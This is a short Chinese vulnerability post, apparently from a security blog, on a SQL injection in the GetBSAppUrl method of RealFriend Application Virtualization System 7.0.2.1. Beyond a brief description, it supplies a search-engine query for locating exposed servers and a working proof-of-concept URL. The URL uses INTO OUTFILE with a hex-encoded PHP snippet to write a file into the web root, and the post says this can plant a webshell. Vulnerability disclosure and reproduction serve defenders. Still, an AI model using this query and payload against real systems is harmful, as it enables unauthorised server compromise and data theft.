瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞

漏洞描述

瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞,由于参数传入没有进行过滤导致存在SQL注入,攻击者通过漏洞可以获取数据库敏感信息。

漏洞影响

瑞友应用虚拟化系统 7.0.2.1

网络测绘

“CASMain.XGI?cmd=GetDirApp” && title==”瑞友应用虚拟化系统”

漏洞复现

登陆页面

20240330115424463-png (17)

在 GetBSAppUrl 方法中存在SQL注入漏洞,通过漏洞可以写入Webshell文件

20240330115507439-png (18)

验证POC

/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123

20240330115537249-png (19)

/test7.php

20240330115614233-png (20)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容